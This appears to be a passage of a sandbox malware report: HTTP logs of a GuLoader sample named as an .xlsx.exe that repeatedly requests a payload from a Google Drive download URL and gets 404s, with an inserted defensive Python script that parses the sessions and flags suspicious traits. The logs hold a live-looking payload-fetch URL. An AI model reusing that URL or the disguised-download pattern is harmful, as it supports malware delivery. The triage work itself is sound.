2024-12-16 16:57:45 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 2d 6b 57 4b 4a 31 53 31 78 47 57 79 39 42 34 33 5f 49 71 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q-kWKJ1S1xGWy9B43_IqZA">*{margin:0;padding:0}html,code{font:15px/22px arial
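The two sessions above are the whole download chain of this sample: drive.google.com answers the /uc?export=download request with a 303 to drive.usercontent.google.com, and that host returns 404, so the XOR-encoded payload GuLoader expected was never delivered. The following Python is an added example and is not part of the Joe Sandbox report; it parses a transcription of those sessions (in a line format of my own, labelled as constructed in the code) together with the A records from the DNS section, rebuilds the redirect chain per Drive file id, reports whether the final hop ever returned a body, and runs three checks a triage analyst would make on the same data: the TCP destination agrees with what DNS returned for the Host header, a browser User-Agent is being sent by a process that is not a browser, and the process name carries a double extension. The browser-process set and the lure-suffix list are assumptions, not values from the report.

```python
"""Parse sandbox HTTP session logs and reconstruct a Google Drive download chain."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed input: sessions 0 and 1 of this report, transcribed into a line
# format of my own (a SESSION header, then OUT/IN lines); only the lines the
# parser consumes are kept.
SAMPLE_LOG = """\
SESSION 0 192.168.2.8:49709 -> 172.217.19.174:443 PID 928 C:\\Users\\user\\Desktop\\09-FD-94.03.60.175.07.xlsx.exe
OUT GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
OUT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
OUT Host: drive.google.com
IN HTTP/1.1 303 See Other
IN Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
SESSION 1 192.168.2.8:49711 -> 142.250.181.1:443 PID 928 C:\\Users\\user\\Desktop\\09-FD-94.03.60.175.07.xlsx.exe
OUT GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
OUT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
OUT Host: drive.usercontent.google.com
IN HTTP/1.1 404 Not Found
IN Content-Type: text/html; charset=utf-8
"""

# A records from the report's DNS answers (name -> address), transcribed here.
DNS_ANSWERS = {"drive.google.com": "172.217.19.174",
               "drive.usercontent.google.com": "142.250.181.1"}
# Assumption: the processes from which a browser User-Agent is expected.
BROWSER_PROCESSES = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumption: benign-looking suffixes that a double-extension lure hides behind.
LURE_SUFFIXES = {"xlsx", "xls", "docx", "doc", "pdf", "jpg", "png", "txt"}

SESSION_RE = re.compile(r"SESSION (\d+) (\S+) -> (\S+) PID (\d+) (.+)$")
REQUEST_RE = re.compile(r"^[A-Z]+ \S+ HTTP/")

def parse_sessions(log):
    """Return one dict per session: endpoints, process, request line, status, headers."""
    sessions, cur = [], None
    for line in log.splitlines():
        if line.startswith("SESSION "):
            m = SESSION_RE.match(line)
            cur = {"id": int(m.group(1)), "src": m.group(2), "dst": m.group(3),
                   "pid": int(m.group(4)), "process": m.group(5),
                   "headers_out": {}, "headers_in": {}, "status": None}
            sessions.append(cur)
            continue
        direction, _, payload = line.partition(" ")
        if cur is None or direction not in ("OUT", "IN"):
            continue
        if direction == "OUT" and REQUEST_RE.match(payload):
            cur["method"], cur["path"], _ = payload.split(" ", 2)
        elif direction == "IN" and payload.startswith("HTTP/"):
            cur["status"] = int(payload.split(" ")[1])
        elif ":" in payload:  # header line; keys are case-insensitive, so lowercase them
            name, _, value = payload.partition(":")
            side = cur["headers_out"] if direction == "OUT" else cur["headers_in"]
            side[name.strip().lower()] = value.strip()
    return sessions

def drive_file_id(url):
    """Drive file id carried in the ?id= parameter, or None."""
    return parse_qs(urlparse(url).query).get("id", [None])[0]

def redirect_chains(sessions):
    """Group sessions by Drive file id; each hop records host, status and Location."""
    chains = {}
    for s in sessions:
        host = s["headers_out"].get("host", "")
        fid = drive_file_id("https://" + host + s.get("path", "/"))
        if fid is None:
            continue
        chains.setdefault(fid, []).append(
            {"host": host, "status": s["status"], "location": s["headers_in"].get("location")})
    return chains

def payload_retrieved(chain):
    """True only if the final hop answered 2xx; a 404 means the hosted payload is gone."""
    return bool(chain) and chain[-1]["status"] is not None and 200 <= chain[-1]["status"] < 300

def host_consistent_with_dns(session, dns_answers):
    """Does the TCP destination match what DNS returned for the Host header?"""
    dst_ip = session["dst"].rsplit(":", 1)[0]
    return dns_answers.get(session["headers_out"].get("host")) == dst_ip

def browser_ua_from_non_browser(session):
    """Flag a browser-style User-Agent sent by a process that is not a browser."""
    ua = session["headers_out"].get("user-agent", "")
    proc = session["process"].rsplit("\\", 1)[-1].lower()
    return bool(re.search(r"(Firefox|Chrome|Edg|Safari)/\d", ua)) and proc not in BROWSER_PROCESSES

def double_extension(path):
    """True for names like report.xlsx.exe: an executable suffix behind a lure suffix."""
    parts = path.rsplit("\\", 1)[-1].lower().split(".")
    return len(parts) >= 3 and parts[-1] in {"exe", "scr", "com"} and parts[-2] in LURE_SUFFIXES

if __name__ == "__main__":
    sessions = parse_sessions(SAMPLE_LOG)
    for fid, chain in redirect_chains(sessions).items():
        hops = " -> ".join(f"{h['host']} ({h['status']})" for h in chain)
        print(f"{fid}: {hops}; payload retrieved: {payload_retrieved(chain)}")
    for s in sessions:
        print(f"session {s['id']}: dns-consistent={host_consistent_with_dns(s, DNS_ANSWERS)}, "
              f"browser-UA-from-non-browser={browser_ua_from_non_browser(s)}, "
              f"double-extension={double_extension(s['process'])}")
```

On this report's data the chain resolves to drive.google.com (303) -> drive.usercontent.google.com (404) with no payload, both destinations match the DNS answers, and the Firefox User-Agent is sent by the .xlsx.exe sample itself. The DNS check is worth keeping in a triage script: a loader that hard-codes an address or fronts through an unrelated host will fail it even when the Host header looks benign.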


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 16:57:46 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
2024-12-16 16:57:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:47 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-1BHfC7Cb7mIyKiLupaOSSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.8 | 49713 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:49 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4RiefLl7qtWaDPETfzM1yTb_9B2r_CaWGLI2NqmfUnyR6mkUk2LA-fv-MfJwtxQE-A
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:50 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-i4SZdSRTxK8HNjMx0AacNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:50 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4d 69 47 34 63 58 30 6a 38 32 71 2d 38 69 33 5a 74 30 64 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hMiG4cX0j82q-8i3Zt0daA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.8 | 49714 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:52 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-_7Au-6Svi2ShC7pPt6BY0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.8 | 49715 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:55 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:56 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5T54kqLTEwunHgUPdaz6pUFI6X0YMkjxC5u4osWLlhWlHDDjC9O9ycICCF7yT4TGgB
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:55 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-t9AKfqNhO7sj8GIw9ym2EA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:56 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 48 68 5f 4c 42 77 6d 48 74 44 33 47 54 5f 77 61 76 47 4a 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FHh_LBwmHtD3GT_wavGJOA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.8 | 49716 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:57:57 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-FJaJtobr5UzRONb7Bgmr-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.8 | 49717 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:00 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4vVjoIim0YxDVexvmkjvQhK_A4gqJrul5voHTdbvq5TMtaCfuehoNascKx_5m3Rz-a
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:01 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-xAPF-d_0sRNahErAT3pozQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
